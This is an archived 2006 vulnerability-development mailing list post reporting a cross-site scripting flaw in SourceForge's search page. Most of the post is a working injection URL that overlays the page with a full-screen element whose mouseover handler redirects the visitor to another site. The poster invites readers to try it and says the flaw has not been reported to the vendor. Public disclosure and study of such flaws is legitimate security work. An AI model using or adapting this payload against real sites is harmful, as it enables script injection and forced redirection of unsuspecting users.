Vulnerability Development mailing list archives
Sourceforge.net XSS
From: the.spikey () gmail com
Date: 9 Apr 2006 18:13:31 -0000
Hey guys, I found this kind of 'hole' in sf.net, you can exucute some code, not all.(i.e. you cannot use a / ) I have not reported this yet, i'm sorry :+ Try it out: http://sourceforge.net/search/?type_of_search=soft&forum_id=0&group_id=0&atid=0&words=<span style="position: fixed; top: 0px; left: 0px; color: red; width: 1000px; height: 1000px" onmouseOver="javascript:window.location='http://www.google.nl'">&Search=Search Spiked www.geekshangout.org
Current thread:
- Sourceforge.net XSS the . spikey (Apr 09)
- <Possible follow-ups>
- Re: Sourceforge.net XSS v9 (Apr 12)
- Re: Sourceforge.net XSS Daniel (Apr 12)
- Re: Re: Sourceforge.net XSS v9 (Apr 13)
- Re: Sourceforge.net XSS ascii (Apr 13)
- Re: Sourceforge.net XSS Juan C Calderon (Apr 17)
- Re: Sourceforge.net XSS v9 (Apr 17)
- Re: Sourceforge.net XSS morgan allen (Apr 18)
- Re: Sourceforge.net XSS Valdis . Kletnieks (Apr 18)
- Re: Sourceforge.net XSS Juan C Calderon (Apr 18)
- Re: Sourceforge.net XSS v9 (Apr 17)